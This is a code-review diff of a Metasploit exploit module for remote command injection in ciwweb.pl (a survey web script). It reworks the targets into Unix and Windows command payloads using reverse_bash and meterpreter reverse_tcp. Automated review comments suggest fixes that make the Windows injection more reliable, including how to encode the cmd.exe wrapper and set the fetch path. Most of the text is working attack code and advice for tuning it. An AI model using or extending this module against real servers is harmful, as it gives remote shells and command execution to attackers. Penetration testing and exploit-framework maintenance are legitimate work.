@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
77 Rank = ExcellentRanking
88
99 include Msf ::Exploit ::Remote ::HttpClient
10- include Msf ::Exploit ::CmdStager
1110 prepend Msf ::Exploit ::Remote ::AutoCheck
1211
1312 def initialize ( info = { } )
@@ -26,7 +25,7 @@ def initialize(info = {})
2625 Successful exploitation may result in remote code execution under the privileges
2726 of the web server, potentially exposing sensitive data or disrupting survey operations.
2827
29- An attacker can execute arbitrary system commands as the web server.
28+ An attacker can execute arbitrary system commands in the context of the user running the web server.
3029 } ,
3130 'License' => MSF_LICENSE ,
3231 'Author' => [
@@ -41,45 +40,27 @@ def initialize(info = {})
4140 'Arch' => [ ARCH_CMD ] ,
4241 'Targets' => [
4342 [
44- 'Linux Dropper' ,
45- {
46- 'Platform' => [ 'linux' ] ,
47- 'Arch' => [ ARCH_X64 , ARCH_X86 , ARCH_ARMLE , ARCH_AARCH64 ] ,
48- 'Type' => :nix_dropper ,
49- 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
50- }
51- ] ,
52- [
53- 'Linux Command' ,
43+ 'Unix Command' ,
5444 {
5545 'Platform' => [ 'unix' , 'linux' ] ,
56- 'Arch' => [ ARCH_CMD ] ,
57- 'Type' => :nix_command ,
58- 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
59- }
60- ] ,
61- [
62- 'Windows Dropper' ,
63- {
64- 'Platform' => 'win' ,
65- 'Arch' => [ ARCH_X64 , ARCH_X86 , ARCH_ARMLE , ARCH_AARCH64 ] ,
66- 'Type' => :windows_dropper ,
67- 'DefaultOptions' => {
68- 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
69- }
46+ 'Arch' => ARCH_CMD ,
47+ 'Type' => :unix_cmd
48+ # Tested with cmd/unix/reverse_bash
49+ # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
7050 }
7151 ] ,
7252 [
7353 'Windows Command' ,
7454 {
75- 'Platform' => 'win' ,
76- 'Arch' => [ ARCH_CMD ] ,
77- 'Type' => :windows_command ,
55+ 'Platform' => [ 'windows' ] ,
56+ 'Arch' => ARCH_CMD ,
57+ 'Type' => :win_cmd ,
7858 'DefaultOptions' => {
79- 'PAYLOAD ' => 'cmd/windows/http/x64/meterpreter/reverse_tcp '
59+ 'FETCH_WRITABLE_DIR ' => 'C:\\\\Windows\\\\Tasks\\\\ '
8060 }
61+ # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
8162 }
82- ]
63+ ] ,
8364 ] ,
8465 'DefaultTarget' => 0 ,
8566 'DisclosureDate' => '2025-07-16' ,
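Review bot: The reason the Windows target pins `FETCH_WRITABLE_DIR` to C:\Windows\Tasks is no longer explained anywhere in the module: the removed exploit body carried the note that the injection point does not expand environment variables such as %TEMP%, so the path must be explicit, and that the staged file is not deleted afterwards. That caveat matters to an operator choosing a payload and should move next to the option, e.g. `# The injection does not expand %TEMP%, so the fetch path must be explicit; the staged file is not removed afterwards` directly above the `'FETCH_WRITABLE_DIR'` line. Separately, the single-quoted literal `'C:\\\\Windows\\\\Tasks\\\\'` evaluates to doubled backslashes (`C:\\Windows\\Tasks\\`), whereas the removed WritableDir default used single ones; if the doubling is not deliberate for the cmd.exe quoting layer added elsewhere in the module, `'C:\\Windows\\Tasks\\'` is the equivalent of the old default, though the doubling may also be an artifact of how this page renders the text rather than the committed source.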
@@ -95,7 +76,6 @@ def initialize(info = {})
9576 [
9677 OptString . new ( 'TARGETURI' , [ true , 'Path to vulnerable ciwweb.pl' , '/cgi-bin/ciwweb.pl' ] ) ,
9778 OptString . new ( 'STUDYNAME' , [ false , 'Value for the hid_studyname GET parameter' , '' ] ) ,
98- OptString . new ( 'WritableDir' , [ false , 'Writable directory for Windows Dropper' , 'C:\\Windows\\Tasks\\' ] )
9979 ]
10080 )
10181 end
@@ -133,8 +113,11 @@ def check
133113 CheckCode ::Safe
134114 end
135115
136- def execute_command ( cmd , _opts = { } )
137- cmd = Rex ::Text . uri_encode ( cmd ) . gsub ( '\\' , '%5C' ) . gsub ( '/' , '%2F' )
116+ def exploit
117+ print_status ( 'Uploading malicious payload...' )
118+
119+ cmd = Rex ::Text . uri_encode ( payload . encoded ) . gsub ( '\\' , '%5C' ) . gsub ( '/' , '%2F' )
120+ cmd = "cmd.exe%20/q%20/c%20\" #{ cmd } \" " if target [ 'Type' ] == :win_cmd
138121
139122 query = [
140123 'hid_javascript=1' ,
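Review bot: The `cmd.exe /q /c` wrapper added for the Windows target leaves its two enclosing double quotes as raw `"` characters in the query string while every other byte of the command has been percent-encoded, which is inconsistent and relies on the web server and ciwweb.pl tolerating an unencoded `"` in the URI; encoding them the same way is safer, `cmd = "cmd.exe%20/q%20/c%20%22#{cmd}%22" if target['Type'] == :win_cmd`. The payload body itself goes through uri_encode first, so a `"` inside payload.encoded should not be able to terminate the wrapper early, but that only holds as long as the call keeps its default encoding mode. The status message `Uploading malicious payload...` is also inaccurate for both remaining targets, since this method sends a single command rather than uploading anything; `print_status('Sending payload command...')` would describe it. The `exploit` method continues past the end of this hunk, so how `query` is assembled and sent is not visible here.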
@@ -158,20 +141,4 @@ def execute_command(cmd, _opts = {})
158141 end
159142 end
160143 end
161-
162- def exploit
163- print_status ( 'Uploading malicious payload...' )
164-
165- case target [ 'Type' ]
166- when :windows_dropper
167- # This applies only to Windows
168- # The RCE doesn’t resolve environment variables like %TEMP%, so the path must be specified explicitly
169- # Files on the disk are also not deleted
170- execute_cmdstager ( temp : datastore [ 'WritableDir' ] )
171- when :nix_dropper
172- execute_cmdstager
173- when :windows_command , :nix_command
174- execute_command ( payload . encoded )
175- end
176- end
177144end